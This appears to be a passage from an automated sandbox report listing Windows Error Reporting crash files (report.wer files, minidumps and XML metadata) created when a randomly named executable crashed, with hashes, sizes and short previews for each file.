                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.0.0.2.2.3.4.8.8.1.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.0.0.2.3.6.7.6.9.6.7.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.f.7.9.6.1.3.-.1.b.c.7.-.4.f.5.6.-.9.1.5.8.-.a.f.4.5.c.6.a.6.c.2.7.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.7.5.a.e.8.3.-.b.4.b.6.-.4.0.8.5.-.9.2.f.2.-.7.6.c.a.f.7.2.f.0.2.6.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.b.8.-.0.0.0.1.-.0.0.1.4.-.9.8.f.6.-.9.4.c.1.5.f.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.2.e.5.7.8.4.9.3.5.7.1.4.b.4.7.7.8.e.e.1.d.7.b.e.6.7.1.3.7.a.5.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....T.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tGYLgZxMWmmBTD.e_7861b0bb7bc644126dae152d1d917bb866b9f5db_040324e6_52f7a285-b762-402a-9972-663aea85983a\Report.wer

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.9485464399895285
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ht1eiRpJij0BU/bf+fxjRJkVzuiF0zZ24IO8m3fHcs:JDJbBU/ojPczuiF2Y4IO8Qcs
                                                                                                                                                                                                              MD5:6D0C71898C1036BA9DBF97353EC2E2E6
                                                                                                                                                                                                              SHA1:E23EEDC5505965BE55BD5C965BC6DCFE571863A0
                                                                                                                                                                                                              SHA-256:B007A36DFBDB1FC376A27D433B4BF7E064027C48AB67F3E0D74030E4C7BC319A
                                                                                                                                                                                                              SHA-512:F29C44041CC3CABE554D07FD17646FE015853BDA33C6B328E5B49F43690FA072364050BE528C8D7A97F97060FD355EC876AE33BB9027C3584A4AF37A52997431
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.0.0.2.4.9.6.2.1.8.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.0.0.2.6.0.7.1.5.0.9.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.f.7.a.2.8.5.-.b.7.6.2.-.4.0.2.a.-.9.9.7.2.-.6.6.3.a.e.a.8.5.9.8.3.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.3.2.6.f.5.1.-.8.e.8.b.-.4.a.8.0.-.a.3.b.7.-.4.8.a.5.8.c.a.d.5.7.b.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.8.8.-.0.0.0.1.-.0.0.1.4.-.7.6.b.d.-.9.1.c.1.5.f.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.2.e.5.7.8.4.9.3.5.7.1.4.b.4.7.7.8.e.e.1.d.7.b.e.6.7.1.3.7.a.5.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....T.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tGYLgZxMWmmBTD.e_7861b0bb7bc644126dae152d1d917bb866b9f5db_040324e6_a896522c-e56c-4e65-9c62-30ffa92d38b9\Report.wer

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.9487223752287894
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:OlheiRpCij0BU/bf+fxjRJkVzuiF0zZ24IO8m3fHcsS:aDCbBU/ojPczuiF2Y4IO8QcsS
                                                                                                                                                                                                              MD5:FEBE5F77057AA83A90391260DB371ABB
                                                                                                                                                                                                              SHA1:06D5FB6A7CCA105E10CD023FE9ACAB55C9CA1C88
                                                                                                                                                                                                              SHA-256:E98ADBEB30E1685EA637B7D093BB94763022389244C3451BD15B96F413991294
                                                                                                                                                                                                              SHA-512:6D8B50190066EF74DA346B6185399E4F9BC36E5DF548F4A8F020BD9D1A6D75DCC4694239E1DA7FB70AA2F77679FCB76AD49CB35A67FFB9AB8BF388009B918501
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.0.0.3.2.8.6.4.6.7.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.0.0.3.4.2.5.5.3.0.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.8.9.6.5.2.2.c.-.e.5.6.c.-.4.e.6.5.-.9.c.6.2.-.3.0.f.f.a.9.2.d.3.8.b.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.7.6.2.0.8.f.-.4.d.c.3.-.4.a.b.3.-.b.8.8.c.-.c.0.2.a.e.4.9.1.0.c.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.7.c.-.0.0.0.1.-.0.0.1.4.-.6.8.a.5.-.8.1.c.1.5.f.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.2.e.5.7.8.4.9.3.5.7.1.4.b.4.7.7.8.e.e.1.d.7.b.e.6.7.1.3.7.a.5.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....T.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tGYLgZxMWmmBTD.e_7861b0bb7bc644126dae152d1d917bb866b9f5db_040324e6_bdf81a5d-831e-4732-831a-73aeea4608a6\Report.wer

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.948119808669188
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:vQdfeiRp5ij0BU/bf+fxjRJkVzuiF0zZ24IO8m3fHcs:oD5bBU/ojPczuiF2Y4IO8Qcs
                                                                                                                                                                                                              MD5:75F305F4A8C049F57CB2236C73D93848
                                                                                                                                                                                                              SHA1:DC153EB3CD774EA29B51D243F833F9D39901ECA0
                                                                                                                                                                                                              SHA-256:A77D45F5383E8A5E6E997048FFD99EA2F743EFB53A8D08712663CDB82A1B7314
                                                                                                                                                                                                              SHA-512:12F06E08EDB8B84BDC43FBE09CA4973718CC02D70E7347DA08BEC6F115094648FAD8993D255DD5FD2685E769AC6FB157EBF40907260E4EDE03222BE48E75361D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.0.0.2.9.1.1.3.4.1.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.0.0.2.9.8.6.3.4.1.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.f.8.1.a.5.d.-.8.3.1.e.-.4.7.3.2.-.8.3.1.a.-.7.3.a.e.e.a.4.6.0.8.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.0.d.5.0.3.1.3.-.1.7.4.0.-.4.4.3.c.-.b.a.0.1.-.e.4.4.e.e.1.5.2.1.9.c.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.2.c.-.0.0.0.1.-.0.0.1.4.-.e.d.4.8.-.8.a.c.1.5.f.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.2.e.5.7.8.4.9.3.5.7.1.4.b.4.7.7.8.e.e.1.d.7.b.e.6.7.1.3.7.a.5.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....T.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER36F7.tmp.dmp

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:42 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):96734
                                                                                                                                                                                                              Entropy (8bit):1.994481622810103
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:dtcJksDDcz72/ggAYJGqxUeAMLsQFb5yFF+wWPyOVIs2iX:LcJdDQzSgFYVx3rLDFb5kFBC
                                                                                                                                                                                                              MD5:BFBF8151815AAD3436F51D1F7FAF4B72
                                                                                                                                                                                                              SHA1:5C277805C73C325B4DE904B56DBB9DFC27BA732B
                                                                                                                                                                                                              SHA-256:67913DD7BDAFE50489B7D8D94D1A01454EF7181E09EB6395E3E6715B040742C8
                                                                                                                                                                                                              SHA-512:1A331BC962A4D6E46239C19B9F4325549D22AC258712AAC79C189276B8F179B66EF6234E2E8F60D476AA5EBB30F30546BF72A218EE20500A21FA4667205A5736
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MDMP..a..... ........?2g........................................X?..........T.......8...........T...........H"...W......................................................................................................eJ......@.......GenuineIntel............T............?2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER37F1.tmp.dmp

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:42 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):92934
                                                                                                                                                                                                              Entropy (8bit):1.7952654931214136
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:LhtjPpARczgyf8qDTKM4hndL3a3Zw3HPGGHMMqqkffvCNBmuU:/Pp/zgsNSndQZKH1FK
                                                                                                                                                                                                              MD5:7B66D59FD5386AD690E9BDC877F98B78
                                                                                                                                                                                                              SHA1:35F773F697611CE048E5EB56F61B2AD911583BDE
                                                                                                                                                                                                              SHA-256:110FAEF3FE9079D72677DD5630AA913F7DA91A6E1A5BD1EFBE7D3D0576642FC1
                                                                                                                                                                                                              SHA-512:C68D980482F2FDCB1409FE721422441444EAE1A04D5635275986FA20A67D0D468790A34EFEB91AD64A3F0EF2BDE4E825037725ECC2B07A466A24E94140BBEE69
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MDMP..a..... ........?2g.........................................>..........T.......8...........T...........X!...I..........P...........<...............................................................................eJ..............GenuineIntel............T............?2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER3830.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                              Entropy (8bit):3.7069257972021874
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJ6ke6sJz6YSsSU91jgmfYfNprq89bGNsfFrim:R6lXJm6u6YZSU91jgmfQDGGfFP
                                                                                                                                                                                                              MD5:9B53746AC2192C87B29F21EE563950FC
                                                                                                                                                                                                              SHA1:324A3BE94B4059B211F3E619FE9CF55298D48B22
                                                                                                                                                                                                              SHA-256:33E40B5BE04B0BC5A0546229222F961F131B60A7C9D33924A29DDC728B4F0320
                                                                                                                                                                                                              SHA-512:42A060602E43C9DF4444790DDB67483734872A2A1B38BBB4CB8120C02F519EFD13798CD57E10F7AD6E53EB1FA2C60B16DFABD6886DD7B8F526E0200246D33390
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.7.6.<./.P.i.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER387F.tmp.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.531455618853338
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYMYm8M4JYwFQ+q8mPrNp/4Sid:uIjfYI7QI7VUJUnrb4Sid
                                                                                                                                                                                                              MD5:A736573270C183818C8B3178FC8C7A5D
                                                                                                                                                                                                              SHA1:DE35285F7AD02ED653AB723BFB360C5BB5D6BC6E
                                                                                                                                                                                                              SHA-256:9E2A03BC3855314404680F37172F6E2FB273FA9A76139C9BA6A7166CDF2D7521
                                                                                                                                                                                                              SHA-512:6F80BAB0D8E404ABE4697088CA09974BE872A3F3060DCA5B12EC90F0EBFDE754D74B9D76F526DF96F3A281A017A1DFA426B714001BB9C9E13D149B143B3AB258
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER393A.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                              Entropy (8bit):3.706617188632087
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJYkj6P6YSHSU91jgmfYfNpr/89bGysfoim:R6lXJ96P6YSSU91jgmfQwGxfc
                                                                                                                                                                                                              MD5:160B81F2E9EFFD8BD36A0B0949A8FD3B
                                                                                                                                                                                                              SHA1:1ED1B0501C9909C469BEE95A09A788ACF90E092D
                                                                                                                                                                                                              SHA-256:57A10E1FFED507539AAD79BE14D5F991E8ECD59ADC6A296C9B23194CD6B61865
                                                                                                                                                                                                              SHA-512:2085B031886B67DAE0FD8B07A657079C08AE8BDFF5394DF518A8BB17B06B3C4562DA33A8FFD2CBCEC3544227FC00D6A657A830748805177E3E49B5383335062A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.5.2.<./.P.i.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AF0.tmp.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.534012882858388
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYjoYm8M4JYwFd+q8m5pNp/4STd:uIjfYI7QI7VgJ5zb4STd
                                                                                                                                                                                                              MD5:E4FABB942ABA34DC9E7E7A5A441927ED
                                                                                                                                                                                                              SHA1:42C60002D9E4CB860F8F6E6DA9B85E962739EB4E
                                                                                                                                                                                                              SHA-256:60D5C32DCDDAF12C4F75EE12D8DDD5457E7D5462A6183B4171DB3A9F2EC76059
                                                                                                                                                                                                              SHA-512:B1E6C5D23C860306B79430B741B09B837E73294A605139F0E4A4C72164426415DFA9F7AAFC615E7C72A13EF637A582790D7011489646E41B04C860C80FF00D46
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E0B.tmp.dmp

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:44 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):70848
                                                                                                                                                                                                              Entropy (8bit):1.9023335086240334
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Y2kgV2Nczn8/qJ4vo0SgTgq84VmWDelMHnj:YgYaz8Q4vol5kDelMH
                                                                                                                                                                                                              MD5:C8955F9D80E24D7F962E8BCC7518945E
                                                                                                                                                                                                              SHA1:59445D3B96A45976BD5A5C1DE42877F3BB1E4736
                                                                                                                                                                                                              SHA-256:9F70729189C6158637CFCCFADED0FD7DC81B61D4FA7D65E185756D9B637D795B
                                                                                                                                                                                                              SHA-512:185CF8D9D0AFA71F30C1FFCBF4F2247B4DEC0504B6CBA5E4273B93912395317314A27378094ABEBC133CC6F69A344523B718645054B2199A6400A2F46766594D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MDMP..a..... ........?2g............$...............,............5..........T.......8...........T...........P...p.......................................................................................................eJ......D.......GenuineIntel............T............?2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F64.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                              Entropy (8bit):3.709721342230337
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJXkt6uT6YSkSU9V5gmfYfNpr089bwYsfuwm:R6lXJ26uT6YxSU9V5gmfQhwLfg
                                                                                                                                                                                                              MD5:2A2C91CAC6643966224243163A432047
                                                                                                                                                                                                              SHA1:0448F042DDD50B3677427F4D15D2322EED9387AE
                                                                                                                                                                                                              SHA-256:5BDC941439E1189816A9A881B21EF8532EC9AA950F7DEF4D0DB1633CE34155E1
                                                                                                                                                                                                              SHA-512:B35E7144B89A2FBD03C8874B4E71B972C5D1D4B8B5FBEF644CA9085F626CB8549A99FE94C6D93FEC66F0882FBC4BD111E043D09F614FC7C2949E634D1FE588A1
                                                                                                                                                                                                              Malicious:false
